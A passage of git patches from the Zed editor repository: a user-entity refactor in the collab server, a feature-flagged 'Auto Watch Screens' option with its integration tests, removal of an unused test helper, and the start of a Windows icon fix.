+81,7 @@ impl Database { github_name: Option<&str>, github_user_created_at: DateTimeUtc, initial_channel_id: Option, - ) -> Result { + ) -> Result { self.transaction(|tx| async move { self.update_or_create_user_by_github_account_tx( github_login, @@ -103,7 +106,7 @@ impl Database { github_user_created_at: NaiveDateTime, initial_channel_id: Option, tx: &DatabaseTransaction, - ) -> Result { + ) -> Result { if let Some(existing_user) = self .get_user_by_github_user_id_or_github_login(github_user_id, github_login, tx) .await? @@ -156,7 +159,7 @@ impl Database { github_user_id: i32, github_login: &str, tx: &DatabaseTransaction, - ) -> Result> { + ) -> Result> { if let Some(user_by_github_user_id) = user::Entity::find() .filter(user::Column::GithubUserId.eq(github_user_id)) .one(tx) @@ -178,7 +181,7 @@ impl Database { /// get_all_users returns the next page of users. To get more call again with /// the same limit and the page incremented by 1. - pub async fn get_all_users(&self, page: u32, limit: u32) -> Result> { + pub async fn get_all_users(&self, page: u32, limit: u32) -> Result> { self.transaction(|tx| async move { Ok(user::Entity::find() .order_by_asc(user::Column::GithubLogin) @@ -207,7 +210,11 @@ impl Database { } /// Find users where github_login ILIKE name_query. - pub async fn fuzzy_search_users(&self, name_query: &str, limit: u32) -> Result> { + pub async fn fuzzy_search_users( + &self, + name_query: &str, + limit: u32, + ) -> Result> { self.transaction(|tx| async { let tx = tx; let like_string = Self::fuzzy_like_string(name_query); diff --git a/crates/collab/src/db/tables/user.rs b/crates/collab/src/db/tables/user.rs index 97b96661d7b5a7..68044bc4429937 100644 --- a/crates/collab/src/db/tables/user.rs +++ b/crates/collab/src/db/tables/user.rs @@ -19,6 +19,17 @@ pub struct Model { pub created_at: NaiveDateTime, } +impl From for crate::entities::User { + fn from(user: Model) -> Self { + crate::entities::User { + id: user.id, + github_login: user.github_login, + admin: user.admin, + connected_once: user.connected_once, + } + } +} + #[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)] pub enum Relation { #[sea_orm(has_one = "super::room_participant::Entity")] diff --git a/crates/collab/src/entities.rs b/crates/collab/src/entities.rs new file mode 100644 index 00000000000000..2478900d79130f --- /dev/null +++ b/crates/collab/src/entities.rs @@ -0,0 +1,3 @@ +mod user; + +pub use user::*; diff --git a/crates/collab/src/entities/user.rs b/crates/collab/src/entities/user.rs new file mode 100644 index 00000000000000..0c31d78ac51002 --- /dev/null +++ b/crates/collab/src/entities/user.rs @@ -0,0 +1,9 @@ +use crate::db::UserId; + +#[derive(Debug, Clone)] +pub struct User { + pub id: UserId, + pub github_login: String, + pub admin: bool, + pub connected_once: bool, +} diff --git a/crates/collab/src/lib.rs b/crates/collab/src/lib.rs index 7af4216ca5ee69..51541242a4474d 100644 --- a/crates/collab/src/lib.rs +++ b/crates/collab/src/lib.rs @@ -1,6 +1,7 @@ pub mod api; pub mod auth; pub mod db; +pub mod entities; pub mod env; pub mod executor; pub mod rpc; diff --git a/crates/collab/src/rpc.rs b/crates/collab/src/rpc.rs index 2fbbda032cc7ab..4c38887b5412dd 100644 --- a/crates/collab/src/rpc.rs +++ b/crates/collab/src/rpc.rs @@ -1,12 +1,13 @@ mod connection_pool; use crate::api::{CloudflareIpCountryHeader, SystemIdHeader}; +use crate::entities::User; use crate::{ AppState, Error, Result, auth, db::{ self, BufferId, Capability, Channel, ChannelId, ChannelRole, ChannelsForUser, Database, InviteMemberResult, MembershipUpdated, NotificationId, ProjectId, RejoinedProject, - RemoveChannelMemberResult, RespondToChannelInvite, RoomId, ServerId, SharedThreadId, User, + RemoveChannelMemberResult, RespondToChannelInvite, RoomId, ServerId, SharedThreadId, UserId, }, executor::Executor, diff --git a/crates/collab/tests/integration/test_server.rs b/crates/collab/tests/integration/test_server.rs index 33bc373d058019..32f0e29c6dc8ed 100644 --- a/crates/collab/tests/integration/test_server.rs +++ b/crates/collab/tests/integration/test_server.rs @@ -294,7 +294,7 @@ impl TestServer { cx.background_spawn(server.handle_connection( server_conn, client_name, - Principal::User(user), + Principal::User(user.into()), ZedVersion(semver::Version::new(1, 0, 0)), Some("test".to_string()), None, From a65329d8cf3c18f35a6ba8f524618007034d0582 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Fri, 1 May 2026 13:29:27 -0400 Subject: [PATCH 129/231] Add ability to auto watch screens (#54839) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR adds a feature to automatically cycle through screen shares during calls, designed for demo days or any call that has a lot of screen share use. This is a preliminary attempt behind a feature flag so we can dogfood and iterate, or toss it out. There's a new toggle next to the active channel name in the collab panel: **Auto Watch Screens**. https://github.com/user-attachments/assets/ae6eccec-7921-4c1f-8921-c8093631c705 This video demonstrates some cases: Basic auto-watch - Toggle on → automatically opens the next screen share that starts - When the watched screen share ends, switches to the next available share Queuing - Someone starts sharing while another share is active → doesn't interrupt the current share - When the current share ends, the queued share is picked up automatically Paused while sharing - Auto-watch pauses when you start sharing your own screen, so other shares don't pop up during your presentation - When you stop sharing, auto-watch resumes and opens the next available share Multiple watchers - Multiple people can have auto-watch enabled independently — they all see the same transitions Note that we don't manage the screenshares, livekit does, so this change is entirely on the client. I think that's mostly fine, but there is a chance 2 separate clients queues up a different person as the next watched peer if they both engage screenshare around the same time, depending on how it hits the clients, but it seems pretty edge case. We can move the implementation to collab, but it will be more of a project, and adding a secondary source alongside of livekit that could get out of sync and have its own issues. UI/UX needs work (@danilo-leal for suggestions) Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --------- Co-authored-by: Yara 🏳️‍⚧️ <11743287+yara-blue@users.noreply.github.com> --- Cargo.lock | 1 + crates/call/src/call_impl/mod.rs | 25 ++ crates/call/src/call_impl/room.rs | 4 + .../tests/integration/auto_watch_tests.rs | 272 ++++++++++++++++++ .../collab/tests/integration/collab_tests.rs | 1 + crates/collab_ui/Cargo.toml | 1 + crates/collab_ui/src/collab_panel.rs | 83 +++++- crates/feature_flags/src/flags.rs | 8 + crates/livekit_client/src/test.rs | 75 ++++- crates/workspace/src/workspace.rs | 122 +++++++- 10 files changed, 579 insertions(+), 13 deletions(-) create mode 100644 crates/collab/tests/integration/auto_watch_tests.rs diff --git a/Cargo.lock b/Cargo.lock index 68392df3b7ada0..bd5f9f19a5517b 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3279,6 +3279,7 @@ dependencies = [ "collections", "db", "editor", + "feature_flags", "futures 0.3.32", "fuzzy", "gpui", diff --git a/crates/call/src/call_impl/mod.rs b/crates/call/src/call_impl/mod.rs index 39cb4cd9e3cb90..c0c1535cd45684 100644 --- a/crates/call/src/call_impl/mod.rs +++ b/crates/call/src/call_impl/mod.rs @@ -112,6 +112,13 @@ impl AnyActiveCall for ActiveCallEntity { .map_or(false, |room| room.read(cx).is_sharing_project()) } + fn is_sharing_screen(&self, cx: &App) -> bool { + self.0 + .read(cx) + .room() + .map_or(false, |room| room.read(cx).is_sharing_screen()) + } + fn has_remote_participants(&self, cx: &App) -> bool { self.0.read(cx).room().map_or(false, |room| { !room.read(cx).remote_participants().is_empty() @@ -209,6 +216,12 @@ impl AnyActiveCall for ActiveCallEntity { participant_id: *participant_id, }) } + room::Event::LocalScreenShareStarted => { + Some(ActiveCallEvent::LocalScreenShareStarted) + } + room::Event::LocalScreenShareStopped => { + Some(ActiveCallEvent::LocalScreenShareStopped) + } _ => None, }; if let Some(event) = mapped { @@ -297,6 +310,18 @@ impl AnyActiveCall for ActiveCallEntity { ) })) } + + fn peer_ids_with_video_tracks(&self, cx: &App) -> Vec { + let Some(room) = self.0.read(cx).room() else { + return Vec::new(); + }; + room.read(cx) + .remote_participants() + .values() + .filter(|p| p.has_video_tracks()) + .map(|p| p.peer_id) + .collect() + } } pub struct OneAtATime { diff --git a/crates/call/src/call_impl/room.rs b/crates/call/src/call_impl/room.rs index 37a3fd823ec03d..f9df2b758f7664 100644 --- a/crates/call/src/call_impl/room.rs +++ b/crates/call/src/call_impl/room.rs @@ -66,6 +66,8 @@ pub enum Event { RoomLeft { channel_id: Option, }, + LocalScreenShareStarted, + LocalScreenShareStopped, } pub struct Room { @@ -1513,6 +1515,7 @@ impl Room { track_publication: publication, _stream: stream, }; + cx.emit(Event::LocalScreenShareStarted); cx.notify(); } @@ -1674,6 +1677,7 @@ impl Room { let sid = track_publication.sid(); cx.spawn(async move |_, cx| local_participant.unpublish_track(sid, cx).await) .detach_and_log_err(cx); + cx.emit(Event::LocalScreenShareStopped); cx.notify(); } diff --git a/crates/collab/tests/integration/auto_watch_tests.rs b/crates/collab/tests/integration/auto_watch_tests.rs new file mode 100644 index 00000000000000..c8d395407b362b --- /dev/null +++ b/crates/collab/tests/integration/auto_watch_tests.rs @@ -0,0 +1,272 @@ +use crate::TestServer; +use call::ActiveCall; +use gpui::{App, BackgroundExecutor, Entity, TestAppContext, TestScreenCaptureSource}; +use project::Project; +use serde_json::json; +use util::path; +use workspace::Workspace; + +use super::TestClient; + +struct AutoWatchTestSetup { + client_a: TestClient, + _client_b: TestClient, + _client_c: TestClient, + project_a: Entity, +} + +async fn setup_auto_watch_test( + server: &mut TestServer, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) -> AutoWatchTestSetup { + let client_a = server.create_client(user_a, "user_a").await; + let client_b = server.create_client(user_b, "user_b").await; + let client_c = server.create_client(user_c, "user_c").await; + server + .create_room(&mut [ + (&client_a, user_a), + (&client_b, user_b), + (&client_c, user_c), + ]) + .await; + + let active_call_a = user_a.read(ActiveCall::global); + + client_a + .fs() + .insert_tree(path!("/a"), json!({ "file.txt": "content" })) + .await; + let (project_a, _worktree_id) = client_a.build_local_project(path!("/a"), user_a).await; + active_call_a + .update(user_a, |call, cx| call.set_location(Some(&project_a), cx)) + .await + .unwrap(); + + AutoWatchTestSetup { + client_a, + _client_b: client_b, + _client_c: client_c, + project_a, + } +} + +#[gpui::test] +async fn test_auto_watch_opens_existing_share_on_toggle( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + executor.run_until_parked(); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_opens_share_when_no_one_is_sharing_yet( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_switches_to_next_share_on_share_end( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); + + start_screen_share(user_c).await; + executor.run_until_parked(); + + stop_screen_share(user_b); + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_c's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_ignores_shares_while_user_is_sharing( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + start_screen_share(user_a).await; + executor.run_until_parked(); + start_screen_share(user_b).await; + executor.run_until_parked(); + + // Should NOT open B's screen cause we are sharing + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + executor.run_until_parked(); + + // Ensure that no screen share is found in user a's tab bar + workspace_a.update(user_a, |workspace, cx| { + let has_shared_screen_tab = workspace + .active_pane() + .read(cx) + .items() + .any(|item| item.tab_content_text(0, cx).contains("screen")); + assert!( + !has_shared_screen_tab, + "should not open anyone's screen share when toggling on while sharing" + ); + }); +} + +#[gpui::test] +async fn test_auto_watch_opens_share_after_local_user_stops_sharing( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + start_screen_share(user_a).await; + executor.run_until_parked(); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + stop_screen_share(user_a); + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_toggle_off_leaves_tabs_open( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[track_caller] +fn assert_active_matches_title(workspace: &Workspace, expected_title: &str, cx: &App) { + let active_item = workspace.active_item(cx).expect("no active item"); + assert_eq!( + active_item.tab_content_text(0, cx), + expected_title, + "expected active item to be '{}'", + expected_title + ); +} + +async fn start_screen_share(cx: &mut TestAppContext) { + let display = TestScreenCaptureSource::new(); + cx.set_screen_capture_sources(vec![display]); + let screen = cx + .update(|cx| cx.screen_capture_sources()) + .await + .unwrap() + .unwrap() + .into_iter() + .next() + .unwrap(); + let active_call = cx.read(ActiveCall::global); + active_call + .update(cx, |call, cx| { + call.room() + .unwrap() + .update(cx, |room, cx| room.share_screen(screen, cx)) + }) + .await + .unwrap(); +} + +fn stop_screen_share(cx: &mut TestAppContext) { + let active_call = cx.read(ActiveCall::global); + active_call + .update(cx, |call, cx| { + call.room() + .unwrap() + .update(cx, |room, cx| room.unshare_screen(true, cx)) + }) + .unwrap(); +} diff --git a/crates/collab/tests/integration/collab_tests.rs b/crates/collab/tests/integration/collab_tests.rs index 5079698a96a1d0..921319487bf4bf 100644 --- a/crates/collab/tests/integration/collab_tests.rs +++ b/crates/collab/tests/integration/collab_tests.rs @@ -3,6 +3,7 @@ use client::ChannelId; use gpui::{Entity, TestAppContext}; mod agent_sharing_tests; +mod auto_watch_tests; mod channel_buffer_tests; mod channel_guest_tests; mod channel_tests; diff --git a/crates/collab_ui/Cargo.toml b/crates/collab_ui/Cargo.toml index 920f620e0ea2d4..978af1387cbe77 100644 --- a/crates/collab_ui/Cargo.toml +++ b/crates/collab_ui/Cargo.toml @@ -36,6 +36,7 @@ client.workspace = true collections.workspace = true db.workspace = true editor.workspace = true +feature_flags.workspace = true futures.workspace = true fuzzy.workspace = true gpui.workspace = true diff --git a/crates/collab_ui/src/collab_panel.rs b/crates/collab_ui/src/collab_panel.rs index 908d11cd654f9b..cea3806edb3e01 100644 --- a/crates/collab_ui/src/collab_panel.rs +++ b/crates/collab_ui/src/collab_panel.rs @@ -11,6 +11,7 @@ use collections::{HashMap, HashSet}; use contact_finder::ContactFinder; use db::kvp::KeyValueStore; use editor::{Editor, EditorElement, EditorStyle}; +use feature_flags::{AutoWatchFeatureFlag, FeatureFlagAppExt as _}; use fuzzy::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ AnyElement, App, AsyncWindowContext, Bounds, ClickEvent, ClipboardItem, DismissEvent, Div, @@ -35,13 +36,13 @@ use theme::ActiveTheme; use theme_settings::ThemeSettings; use ui::{ Avatar, AvatarAvailabilityIndicator, CollabNotification, ContextMenu, CopyButton, Facepile, - HighlightedLabel, IconButtonShape, Indicator, ListHeader, ListItem, Tab, Tooltip, prelude::*, - tooltip_container, + HighlightedLabel, IconButtonShape, Indicator, ListHeader, ListItem, Tab, TintColor, Tooltip, + prelude::*, tooltip_container, }; use util::{ResultExt, TryFutureExt, maybe}; use workspace::{ - CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, OpenChannelNotesById, - ScreenShare, ShareProject, Workspace, + AutoWatch, CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, + OpenChannelNotesById, ScreenShare, ShareProject, Workspace, dock::{DockPosition, Panel, PanelEvent}, notifications::{ DetachAndPromptErr, Notification as WorkspaceNotification, NotificationId, NotifyResultExt, @@ -2895,13 +2896,75 @@ impl CollabPanel { Section::Offline => SharedString::from("Offline"), }; + let auto_watch_state = self + .workspace + .upgrade() + .map_or(AutoWatch::Off, |workspace| { + *workspace.read(cx).auto_watch_state() + }); + let is_auto_watching = auto_watch_state.enabled(); + let button = match section { - Section::ActiveCall => channel_link.map(|channel_link| { - CopyButton::new("copy-channel-link", channel_link) - .visible_on_hover("section-header") - .tooltip_label("Copy Channel Link") - .into_any_element() - }), + Section::ActiveCall => { + let has_auto_watch_flag = cx.has_flag::(); + let show_auto_watch = has_auto_watch_flag && is_auto_watching; + let show_copy = channel_link.is_some(); + + if show_auto_watch || show_copy { + Some( + h_flex() + .when(has_auto_watch_flag, |this| { + this.child( + IconButton::new( + "auto-watch-screens", + if is_auto_watching { + IconName::Eye + } else { + IconName::EyeOff + }, + ) + .icon_size(IconSize::Small) + .toggle_state(is_auto_watching) + .selected_style(match auto_watch_state { + AutoWatch::Paused => { + ButtonStyle::Tinted(TintColor::Warning) + } + _ => ButtonStyle::Tinted(TintColor::Accent), + }) + .when(!is_auto_watching, |this| { + this.visible_on_hover("section-header") + }) + .tooltip(Tooltip::text(match auto_watch_state { + AutoWatch::Paused => { + "Auto Watch Screens (paused while sharing)" + } + AutoWatch::Active { .. } => "Stop Auto Watching Screens", + AutoWatch::Off => "Auto Watch Screens", + })) + .on_click(cx.listener( + |this, _, window, cx| { + this.workspace + .update(cx, |workspace, cx| { + workspace.toggle_auto_watch(window, cx) + }) + .ok(); + }, + )), + ) + }) + .when_some(channel_link, |this, channel_link| { + this.child( + CopyButton::new("copy-channel-link", channel_link) + .visible_on_hover("section-header") + .tooltip_label("Copy Channel Link"), + ) + }) + .into_any_element(), + ) + } else { + None + } + } Section::Contacts => Some( IconButton::new("add-contact", IconName::Plus) .icon_size(IconSize::Small) diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index b23f8dbc56a7fc..56e3d135d9ee75 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -91,3 +91,11 @@ impl FeatureFlag for AgentThreadWorktreeLabelFlag { } } register_feature_flag!(AgentThreadWorktreeLabelFlag); + +pub struct AutoWatchFeatureFlag; + +impl FeatureFlag for AutoWatchFeatureFlag { + const NAME: &'static str = "auto-watch-screens"; + type Value = PresenceFlag; +} +register_feature_flag!(AutoWatchFeatureFlag); diff --git a/crates/livekit_client/src/test.rs b/crates/livekit_client/src/test.rs index 4b5efe0aafbe5c..955f92dc19d012 100644 --- a/crates/livekit_client/src/test.rs +++ b/crates/livekit_client/src/test.rs @@ -420,7 +420,80 @@ impl TestServer { Ok(sid) } - pub(crate) async fn unpublish_track(&self, _token: String, _track: &TrackSid) -> Result<()> { + pub(crate) async fn unpublish_track(&self, token: String, track_sid: &TrackSid) -> Result<()> { + let claims = livekit_api::token::validate(&token, &self.secret_key)?; + let identity = ParticipantIdentity(claims.sub.unwrap().to_string()); + let room_name = claims.video.room.unwrap(); + + let mut server_rooms = self.rooms.lock(); + let room = server_rooms + .get_mut(&*room_name) + .with_context(|| format!("room {room_name} does not exist"))?; + + if let Some(video_to_unpublish) = room.video_tracks.iter().position(|t| t.sid == *track_sid) + { + let video_to_unpublish = room.video_tracks.remove(video_to_unpublish); + for client_room in room + .client_rooms + .iter() + .filter(|(id, _)| **id != identity) + .map(|(_, room)| room) + { + let track = RemoteTrack::Video(RemoteVideoTrack { + server_track: video_to_unpublish.clone(), + _room: client_room.downgrade(), + }); + let publication = RemoteTrackPublication { + sid: track_sid.clone(), + room: client_room.downgrade(), + track: track.clone(), + }; + let participant = RemoteParticipant { + identity: identity.clone(), + room: client_room.downgrade(), + }; + let event = RoomEvent::TrackUnsubscribed { + track, + publication, + participant, + }; + + client_room.0.lock().updates_tx.blocking_send(event).ok(); + } + } + + if let Some(audio_to_unpublish) = room.audio_tracks.iter().position(|t| t.sid == *track_sid) + { + let audio_to_unpublish = room.audio_tracks.remove(audio_to_unpublish); + for client_room in room + .client_rooms + .iter() + .filter(|(id, _)| **id != identity) + .map(|(_, room)| room) + { + let track = RemoteTrack::Audio(RemoteAudioTrack { + server_track: audio_to_unpublish.clone(), + room: client_room.downgrade(), + }); + let publication = RemoteTrackPublication { + sid: track_sid.clone(), + room: client_room.downgrade(), + track: track.clone(), + }; + let participant = RemoteParticipant { + identity: identity.clone(), + room: client_room.downgrade(), + }; + let event = RoomEvent::TrackUnsubscribed { + track, + publication, + participant, + }; + + client_room.0.lock().updates_tx.blocking_send(event).ok(); + } + } + Ok(()) } diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index b0c5d3cb97df50..45a14fa1a04b97 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -1363,6 +1363,7 @@ pub struct Workspace { project: Entity, follower_states: HashMap, last_leaders_by_pane: HashMap, CollaboratorId>, + auto_watch: AutoWatch, window_edited: bool, last_window_title: Option, dirty_items: HashMap, @@ -1415,6 +1416,19 @@ pub struct FollowerState { items_by_leader_view_id: HashMap, } +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum AutoWatch { + Off, + Active { watched_peer: Option }, + Paused, +} + +impl AutoWatch { + pub fn enabled(&self) -> bool { + matches!(self, AutoWatch::Active { .. } | AutoWatch::Paused) + } +} + struct FollowerView { view: Box, location: Option, @@ -1793,6 +1807,7 @@ impl Workspace { project: project.clone(), follower_states: Default::default(), last_leaders_by_pane: Default::default(), + auto_watch: AutoWatch::Off, dispatching_keystrokes: Default::default(), window_edited: false, last_window_title: None, @@ -4783,6 +4798,93 @@ impl Workspace { } } + pub fn auto_watch_state(&self) -> &AutoWatch { + &self.auto_watch + } + + fn next_watched_peer(&self, cx: &App) -> Option { + self.active_call() + .and_then(|call| call.peer_ids_with_video_tracks(cx).first().copied()) + } + + pub fn toggle_auto_watch(&mut self, window: &mut Window, cx: &mut Context) { + if self.auto_watch.enabled() { + self.auto_watch = AutoWatch::Off; + cx.notify(); + return; + } + + let active_pane = self.active_pane.clone(); + self.unfollow_in_pane(&active_pane, window, cx); + + let local_is_sharing = self + .active_call() + .map_or(false, |call| call.is_sharing_screen(cx)); + + if local_is_sharing { + self.auto_watch = AutoWatch::Paused; + } else { + let watched_peer = self.next_watched_peer(cx); + self.auto_watch = AutoWatch::Active { watched_peer }; + + if let Some(peer_id) = watched_peer { + self.open_shared_screen(peer_id, window, cx); + } + } + + cx.notify(); + } + + fn handle_auto_watch_video_tracks_changed( + &mut self, + peer_id: PeerId, + window: &mut Window, + cx: &mut Context, + ) { + let AutoWatch::Active { watched_peer } = self.auto_watch else { + return; + }; + + let peer_is_sharing = self.active_call().map_or(false, |call| { + call.peer_ids_with_video_tracks(cx).contains(&peer_id) + }); + let should_watch_peer = peer_is_sharing && watched_peer.is_none(); + let watched_peer_stopped_sharing = watched_peer == Some(peer_id) && !peer_is_sharing; + + if should_watch_peer || watched_peer_stopped_sharing { + let next_watched_peer = if should_watch_peer { + Some(peer_id) + } else { + self.next_watched_peer(cx) + }; + + self.auto_watch = AutoWatch::Active { + watched_peer: next_watched_peer, + }; + + if let Some(next_watched_peer) = next_watched_peer { + self.open_shared_screen(next_watched_peer, window, cx); + } + } + } + + fn handle_auto_watch_local_share_stopped( + &mut self, + window: &mut Window, + cx: &mut Context, + ) { + let AutoWatch::Paused = self.auto_watch else { + return; + }; + + let watched_peer = self.next_watched_peer(cx); + self.auto_watch = AutoWatch::Active { watched_peer }; + + if let Some(peer_id) = watched_peer { + self.open_shared_screen(peer_id, window, cx); + } + } + pub fn activate_item( &mut self, item: &dyn ItemHandle, @@ -6512,9 +6614,21 @@ impl Workspace { cx: &mut Context, ) { match event { - ActiveCallEvent::ParticipantLocationChanged { participant_id } - | ActiveCallEvent::RemoteVideoTracksChanged { participant_id } => { + ActiveCallEvent::ParticipantLocationChanged { participant_id } => { + self.leader_updated(participant_id, window, cx); + } + ActiveCallEvent::RemoteVideoTracksChanged { participant_id } => { self.leader_updated(participant_id, window, cx); + self.handle_auto_watch_video_tracks_changed(*participant_id, window, cx); + } + ActiveCallEvent::LocalScreenShareStarted => { + if let AutoWatch::Active { .. } = self.auto_watch { + self.auto_watch = AutoWatch::Paused; + cx.notify(); + } + } + ActiveCallEvent::LocalScreenShareStopped => { + self.handle_auto_watch_local_share_stopped(window, cx); } } } @@ -7879,6 +7993,7 @@ pub trait AnyActiveCall { fn unshare_project(&self, _: Entity, _: &mut App) -> Result<()>; fn remote_participant_for_peer_id(&self, _: PeerId, _: &App) -> Option; fn is_sharing_project(&self, _: &App) -> bool; + fn is_sharing_screen(&self, _: &App) -> bool; fn has_remote_participants(&self, _: &App) -> bool; fn local_participant_is_guest(&self, _: &App) -> bool; fn client(&self, _: &App) -> Arc; @@ -7908,6 +8023,7 @@ pub trait AnyActiveCall { _: &mut Window, _: &mut App, ) -> Option>; + fn peer_ids_with_video_tracks(&self, _: &App) -> Vec; } #[derive(Clone)] @@ -7961,6 +8077,8 @@ pub struct RemoteCollaborator { pub enum ActiveCallEvent { ParticipantLocationChanged { participant_id: PeerId }, RemoteVideoTracksChanged { participant_id: PeerId }, + LocalScreenShareStarted, + LocalScreenShareStopped, } fn leader_border_for_pane( From baf7c0799c39165e1b5172e58bad44d6d687fc3e Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Fri, 1 May 2026 19:47:16 +0200 Subject: [PATCH 130/231] client: Remove unused `FakeServer::build_user_store` method (#55444) This PR removes the `build_user_store` method from the `FakeServer`, as it was not used anywhere. Release Notes: - N/A --- crates/client/src/test.rs | 23 ++--------------------- 1 file changed, 2 insertions(+), 21 deletions(-) diff --git a/crates/client/src/test.rs b/crates/client/src/test.rs index 00d29fe537cd48..ca7f94e9a40734 100644 --- a/crates/client/src/test.rs +++ b/crates/client/src/test.rs @@ -7,17 +7,16 @@ use cloud_api_client::{ }; use cloud_llm_client::{CurrentUsage, UsageData, UsageLimit}; use futures::{StreamExt, stream::BoxStream}; -use gpui::{AppContext as _, Entity, TestAppContext}; +use gpui::{AppContext as _, TestAppContext}; use http_client::{AsyncBody, Method, Request, http}; use parking_lot::Mutex; use rpc::{ConnectionId, Peer, Receipt, TypedEnvelope, proto}; -use crate::{Client, Connection, Credentials, EstablishConnectionError, UserStore}; +use crate::{Client, Connection, Credentials, EstablishConnectionError}; pub struct FakeServer { peer: Arc, state: Arc>, - user_id: u64, } #[derive(Default)] @@ -38,7 +37,6 @@ impl FakeServer { let server = Self { peer: Peer::new(0), state: Default::default(), - user_id: client_user_id, }; client.http_client().as_fake().replace_handler({ @@ -213,23 +211,6 @@ impl FakeServer { fn connection_id(&self) -> ConnectionId { self.state.lock().connection_id.expect("not connected") } - - pub async fn build_user_store( - &self, - client: Arc, - cx: &mut TestAppContext, - ) -> Entity { - let user_store = cx.new(|cx| UserStore::new(client, cx)); - assert_eq!( - self.receive::() - .await - .unwrap() - .payload - .user_ids, - &[self.user_id] - ); - user_store - } } impl Drop for FakeServer { From ae8cba026b3af9c2c4351fb3a8c7dfcc8228fef5 Mon Sep 17 00:00:00 2001 From: Zyl0812 <128681759+Zyl0812@users.noreply.github.com> Date: Sat, 2 May 2026 06:33:54 +0800 Subject: [PATCH 131/231] Fix Windows icon resource for bin zed.exe (#54738) ## Summary Fixes the missing Windows icon and version resource metadata for the executable installed as `bin\zed.exe`. On Windows, the bundling process builds `cli.exe` and installs it as `bin\zed.exe`. The root `Zed.exe` already embeds the Zed Windows icon and version metadata through `crates/zed/build.rs`, but the CLI executable did not 